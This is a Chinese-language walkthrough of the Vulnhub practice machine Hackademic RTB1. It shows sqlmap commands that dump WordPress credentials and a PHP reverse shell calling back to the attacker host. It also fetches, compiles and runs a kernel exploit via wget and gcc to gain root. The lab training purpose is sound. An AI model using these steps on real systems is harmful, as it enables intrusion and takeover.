【Sword系列】Vulnhub靶机HACKADEMIC: RTB1 writeup

靶机介绍

官方下载地址:https://www.vulnhub.com/entry/hackademic-rtb1,17/

需要读取靶机的root目录下key.txt

运行环境:

虚拟机网络设置的是NAT模式

靶机:IP地址:192.168.233.131

攻击机:kali linux,IP地址:192.168.233.129

信息收集

获取靶机IP地址

进入靶机

​​

用wappalyzer查看用到技术

查看开放的端口

扫敏感目录

复制代码
nikto -h http://192.168.233.131
dirb http://192.168.233.131/Hackademic_RTB1/
gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -x html -u http://192.168.233.131

漏洞利用

web端寻找漏洞,php页面,f12代码注入,sql注入

sqlmap注入

复制代码
sqlmap -u http://192.168.243.128/Hackademic_RTB1/?cat=1 --dbs --batch

复制代码
sqlmap -u http://192.168.233.131/Hackademic_RTB1/?cat=1 --dbms=MySQL -D wordpress --tables --batch

复制代码
sqlmap -u http://192.168.233.131/Hackademic_RTB1/?cat=1 --dbms=MySQL -D wordpress -T wp_users --columns --batch

复制代码
sqlmap -u http://192.168.233.131/Hackademic_RTB1/?cat=1 --dbms=MySQL -D wordpress -T wp_users -C user_login,user_pass --dump --batch

GeorgeMiller、q1w2e3登录

getshell

shell.php

复制代码
<div>
<?php
$sock = fsockopen('192.168.233.129','8888');
$descriptorspec = array( 0 => $sock, 1 => $sock, 2 => $sock);
$peocess = proc_open('/bin/sh',$descriptorspec,$pipes);
proc_close($process);
?>
</div>

上传shell

kali打开监听

运行反弹shell

反弹shell成功

提权

找敏感信息

查权限文件

复制代码
find / -user root -perm /4000 2>/dev/null
根目录     用户权限set uid   f文件类型,没有f会有目录

​搜索内核漏洞

复制代码
searchsploit 2.6.31

下载到本地searchsploit -m 15285.c

​kali开启web服务器

在靶机中下载

wget http://192.168.233.129/15285.c

wget ip地址/文件名

编译脚本

复制代码
gcc 15285.c -o exp

将编译的exp赋予执行权限并执行exp

提权成功id为0

相关推荐
wuli_滔滔12 分钟前
CANN安全机制源码探秘 仓库中的权限校验与数据加密实现
安全·cann
张人玉25 分钟前
VisionPro 定位与卡尺测量学习笔记
笔记·学习·计算机视觉·vsionprp
songyuc29 分钟前
【BiFormer】BiFormer: Vision Transformer with Bi-Level Routing Attention 译读笔记
笔记·transformer
liann1191 小时前
3.1_网络——基础
网络·安全·web安全·http·网络安全
觉醒大王1 小时前
强女思维:着急,是贪欲外显的相。
java·论文阅读·笔记·深度学习·学习·自然语言处理·学习方法
三水不滴1 小时前
计网:输入网址到网页显示
经验分享·笔记·计算机网络
独行soc1 小时前
2026年渗透测试面试题总结-17(题目+回答)
android·网络·安全·web安全·渗透测试·安全狮
小羊不会打字1 小时前
CANN 生态中的模型安全加固:`secure-model-deploy` 项目实践指南
安全·neo4j
独行soc2 小时前
2026年渗透测试面试题总结-18(题目+回答)
android·网络·安全·web安全·渗透测试·安全狮
JustDI-CM2 小时前
AI学习笔记-提示词工程
人工智能·笔记·学习